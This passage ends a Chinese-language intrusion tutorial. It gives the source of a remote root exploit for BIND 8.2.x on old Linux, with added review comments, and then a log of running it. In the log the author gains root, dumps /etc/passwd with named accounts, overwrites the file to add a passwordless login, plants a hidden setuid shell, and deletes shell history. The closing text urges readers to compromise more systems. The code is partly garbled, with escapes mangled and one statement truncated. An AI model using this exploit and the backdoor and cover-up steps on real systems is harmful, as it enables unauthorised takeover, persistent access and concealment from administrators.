nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck[1],(('T'<<8)|144),&nb);
}
/* Local TCP port of sck[1], written big-endian into asmcode bytes 54..55 --
 * the 0x1234 immediate of `movw $0x1234,%bx` -- so the payload can pick out
 * this very connection by its peer port (see the cmpw in asmcode). */
n=ntohs(adr.sin_port);
asmcode[4+48+2]=(unsigned char)((n>>8)&0xff);
asmcode[4+48+3]=(unsigned char)(n&0xff);
if(write(sck[0],msg,sizeof(msg))==-1) goto err;
/* NOTE(review): cnt is never checked to be >= 536 before buffer[532..535]
 * and buffer[534..535] are read below; a short reply makes those reads
 * stale/uninitialised stack bytes rather than data from the target */
if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
printf("stack dump:/n");
/* only the part of the reply past byte 512 is shown; no iterations if cnt<512 */
for(i=0;i<(cnt-512);i++){
printf("%s%02x ",(i&&(!(i%16)))?"/n":"",(unsigned char)buffer[512+i]);
}
printf("/n/n");
/* 32-bit word at offset 20 of the dumped region, decoded from target
 * (little-endian) order.  Reading an unsigned int through a char buffer
 * this way violates strict aliasing; memcpy would be the portable form. */
fp=rev(*(unsigned int*)&buffer[532]);
/* 0xfe minus the low byte of the leaked pointer; used to size the filler runs */
ofs=(0xfe)-((fp-(fp&0xffffff00))&0xff);
cnt=163;
/* Checks bytes 2 and 3 of the same word for the 0xbfff.... stack-address
 * pattern.  NOTE(review): with && the rejection fires only when BOTH bytes
 * mismatch, so a value with just one matching byte passes; || looks like
 * the intent, but that cannot be confirmed from this listing. */
if((buffer[512+20+2]!=(char)0xff)&&(buffer[512+20+3]!=(char)0xbf)){
printf("system does not seem to be a vulnerable linux/n");exit(1);
}
/* -s: report and stop; nothing further is sent */
if(flag==1){
printf("system seems to be running bind 8.2.x on a linux/n");exit(-1);
}
/* the fixed 163-byte budget must cover the variable filler plus the 28-byte block */
if(cnt<(ofs+28)){
printf("frame ptr is too low to be successfully exploited/n");exit(-1);
}
/* addresses derived from the leaked word, converted to target byte order */
jmp=rev(fp-586);
ptr6=rev((fp&0xffffff00)-12);
fp=rev(fp&0xffffff00);
/* fp and jmp are already in target order here, hence rev() again for display */
printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);
/* Build the second message in place over the reply still held in buffer.
 * Intended 12-byte header (once the escapes are repaired): ID 0xabcd,
 * flags 0x0100, QDCOUNT 2, ANCOUNT 0, NSCOUNT 0, ARCOUNT 1. */
b=buffer;
memcpy(b,"/xab/xcd/x01/x00/x00/x02/x00/x00/x00/x00/x00/x01",12);b+=12;
for(i=0;i  /* NOTE(review): the rest of this statement is missing from the transcription */
/* Each of these filler loops advances b twice per iteration but stores only
 * once, so 0x01 lands on every other byte; the bytes in between keep whatever
 * the earlier read() left in buffer. */
for(i=0;i<(128>>1);i++,b++) *b++=0x01;
memcpy(b,"/x00/x00/x01/x00/x01",5);b+=5;
for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;
/* length byte for the 28-byte block that follows (7 x 4 bytes) */
*b++=28;
memcpy(b,"/x06/x00/x00/x00",4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,"/x06/x00/x00/x00",4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,&ptr6,4);b+=4;
/* remaining filler out of the 163-byte budget, then a 9-byte trailer */
cnt-=ofs+28;
for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;
memcpy(b,"/x00/x00/x01/x00/x01/x00/x00/xfa/xff",9);b+=9;
if(write(sck[0],buffer,b-buffer)==-1) goto err;
sleep(1);printf("sent!/n");
/* First command pushed down the TCP connection.  Length 14 matches the
 * intended "/bin/uname -a\n"; with the "/n" mangling the literal is 15
 * characters and the trailing 'n' is dropped instead of the newline. */
write(sck[1],"/bin/uname -a/n",14);
/* Relay loop: stdin -> sck[1], sck[1] -> stdout, until either side closes.
 * select() returning -1 is treated as success here; the EWOULDBLOCK/EAGAIN
 * tests are moot on blocking descriptors, and errno is stale when read()
 * returns 0 (EOF), so EOF exits the loop only because the else-branch breaks. */
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck[1],&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck[1],buf,cnt);
}
if(FD_ISSET(sck[1],&fds)){
if((cnt=read(sck[1],buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
exit(0);
err:
/* all network failures funnel here; errno is whatever the failing call left */
perror("error");exit(-1);
}
^D
# gcc -o bind bind.c -lnsl -lsocket
# ./bind
copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86
usage: ./bind address [-s][-e]
-s send infoleak packet
-e send exploit packet
#./bind 192.168.0.20 -e
copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86
stack dump:
42 24 08 08 02 00 b1 ed ca 42 c8 06 95 d0 15 c0
00 cb fa c0 a8 fc ff bf d6 58 08 08 90 3f 0d 08
f4 a4 10 40 16 00 00 00 01 00 00 00 90 3f 0d 08
05 00 00 00 e0 e7 0b 08 16 00 00 00 01 00 00 00
a0 e0 05 08 f4 a4 10 40 c4 fc ff bf 60 e9 0c 08
00 00 00 00 c8 fd ff bf c8 fd ff bf 61 d6 05 08
90 3f 0d 08 bc 76 10 40 b4 11 10 40 14 fe ff bf
01 00 00 00 bc 76 10 40
frame ptr=0xbffffc00 adr=bffffa5e ofs=86 port=e1fa connected! sent!
Linux localhost.localdomain 2.2.14-5.0 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Id
uid=0(root) gid=0(root)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
gdm:x:42:42::/home/gdm:/bin/bash
william:x:500:500:William Wang:/home/william:/bin/bash
www:x:688:501:web user:/home/www:/bin/bash
xeye:x:689:501:Xeye web user:/home/xeye:/bin/bash
td_ftp:x:655:50:TD Bank FTP Client:/home/td_bank:/bin/bash
cyberplex:x:690:100:Cyber:/home/cyberplex:/bin/bash
echo “test::1:0::/:/bin/bash” > /etc/passwd
telnet localhost
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: test
bash$ id
uid=1(bin) gid=0(root) groups=0(root)
bash$ exit
logout
Connection closed by foreign host.
mkdir /usr/lib/…
cp /bin/sh /usr/lib/…/.x
chmod +s /usr/lib/…/.x
exit
#rm –rf /tmp/*.c
#mv bind /usr/lib/…
#mv test /usr/lib/…
#mv lpset /usr/lib/…
#mv snmp /usr/lib/…
#cd
#rm –rf .sh_history /.sh_history
#chmod 777 /usr/lib/…
#exit
$exit
-------------------------------------------------test--------------------------------------------------------------
省略了很多,如后门安装和脚印的擦除等。
其实入侵一个系统后更要注意保持自己在系统上的权限,所以清除日志以免被发现,和安放后门以便再次进入这个系统
都是很重要的。
因为以前写过这方面的教程,就不再写了。
大家慢慢提高自己的技术吧。
有时间就去扩散战果,比如Redhat 7.0和该死的freebsd。
自己想办法哦。
肉鸡找回来几台,最后一篇入侵教程总算也写完了,再见啦~
以后也许会写一些技术分析的文章。
大家好运…